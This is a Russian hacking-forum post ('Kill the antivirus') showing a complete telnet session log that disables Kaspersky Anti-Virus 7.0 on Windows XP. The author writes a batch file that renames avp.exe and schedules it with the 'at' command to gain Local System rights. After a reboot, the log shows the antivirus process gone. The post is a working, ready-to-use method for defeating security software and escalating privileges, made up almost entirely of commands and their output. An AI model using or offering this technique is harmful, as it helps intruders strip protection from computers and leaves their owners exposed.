Форум АНТИЧАТ - Убить антивир

Цитата:

Сообщение от Ra1mer

Не.. Защищен, не хочет.

Естественно, потому как просто админовских прав недостаточно. Подразумевалось, что пользователь сам способен поднять права.
Демонстрирую небольшой лог моей telnet-сессии, как оное должно быть (с мини-комментариями, выделены зелёным, если надо полнее - отпишусь).
Система - Windows XP Pro Sp2, KAV 7.0, потенциально будет работать и на других антивирусах.

C:\>tasklist

Код:

Имя образа                   PID Имя сессии       № сеанса       Память

========================= ====== ================ ======== ============

System Idle Process            0 Console                 0        28 КБ

System                         4 Console                 0       264 КБ

smss.exe                     548 Console                 0       436 КБ

csrss.exe                    700 Console                 0     3 668 КБ

winlogon.exe                 724 Console                 0     4 688 КБ

services.exe                 888 Console                 0     3 196 КБ

lsass.exe                    900 Console                 0     1 388 КБ

svchost.exe                 1104 Console                 0     4 852 КБ

svchost.exe                 1240 Console                 0     4 324 КБ

svchost.exe                 1368 Console                 0    21 720 КБ

svchost.exe                 1580 Console                 0     3 376 КБ

svchost.exe                 1620 Console                 0     4 816 КБ

spoolsv.exe                 1840 Console                 0     4 784 КБ

avp.exe                     2024 Console                 0     7 820 КБ

tlntsvr.exe                  272 Console                 0     2 824 КБ

alg.exe                      912 Console                 0     3 528 КБ

explorer.exe                1504 Console                 0    12 896 КБ

avp.exe                     1788 Console                 0     6 332 КБ

ctfmon.exe                  1876 Console                 0     2 992 КБ

tlntsess.exe                1032 Console                 0     3 768 КБ

cmd.exe                     1320 Console                 0     1 608 КБ

tasklist.exe                1148 Console                 0     3 124 КБ

wmiprvse.exe                 760 Console                 0     5 428 КБ

Как видно, в процессах есть. Ищем папку, пытаемся переименовать.

C:\>cd "c:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0"

C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0>move avp.exe avp.ex_
Отказано в доступе.

Ожидаемый и печальный эффект, поднимаем права до Local System.

C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0>cd \

C:\>copy con kill_avp.bat
@echo off
cd "c:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0"
move avp.exe avp.ex_
^Z
Скопировано файлов: 1.

C:\>type kill_avp.bat
@echo off
cd "c:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0"
move avp.exe avp.ex_

C:\>time
Текущее время: 18:19:05,92
Введите новое время:

C:\>at 18:20 c:\kill_avp.bat
Добавлена новая задача с кодом 1

C:\>cd "c:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0"

C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0>dir *.exe
Том в устройстве C не имеет метки.
Серийный номер тома: D007-EFC9

Содержимое папки C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0

28.06.2007 12:58 10 560 rescue32.exe
1 файлов 10 560 байт
0 папок 1 244 950 528 байт свободно

C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0>dir *.ex_
Том в устройстве C не имеет метки.
Серийный номер тома: D007-EFC9

Содержимое папки C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0

28.06.2007 12:51 218 376 avp.ex_
1 файлов 218 376 байт
0 папок 1 244 950 528 байт свободно

C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0>

Ну вот, собственно говоря, и всё.

C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0>shutdown -r -t 0

сообщение от администратора в PAUL, 24.09.2008 18:25:55

The computer is shutting down......

Подключение к узлу утеряно.

Вторая сессия:

C:\Documents and Settings\admin>tasklist

Код:

Имя образа                   PID Имя сессии       № сеанса       Память

========================= ====== ================ ======== ============

System Idle Process            0 Console                 0        28 КБ

System                         4 Console                 0       264 КБ

smss.exe                     552 Console                 0       384 КБ

csrss.exe                    704 Console                 0     3 220 КБ

winlogon.exe                 728 Console                 0     9 352 КБ

services.exe                 892 Console                 0     2 828 КБ

lsass.exe                    904 Console                 0     5 692 КБ

svchost.exe                 1108 Console                 0     4 452 КБ

svchost.exe                 1256 Console                 0     4 020 КБ

svchost.exe                 1380 Console                 0    17 056 КБ

logonui.exe                 1392 Console                 0     3 508 КБ

svchost.exe                 1528 Console                 0     3 128 КБ

svchost.exe                 1588 Console                 0     3 764 КБ

spoolsv.exe                 1872 Console                 0     4 396 КБ

tlntsvr.exe                  348 Console                 0     2 608 КБ

alg.exe                      780 Console                 0     3 276 КБ

tlntsess.exe                 788 Console                 0     3 536 КБ

wuauclt.exe                 1232 Console                 0     6 436 КБ

cmd.exe                     1360 Console                 0     1 320 КБ

tasklist.exe                1656 Console                 0     3 112 КБ

wmiprvse.exe                1688 Console                 0     5 404 КБ

Any more questions?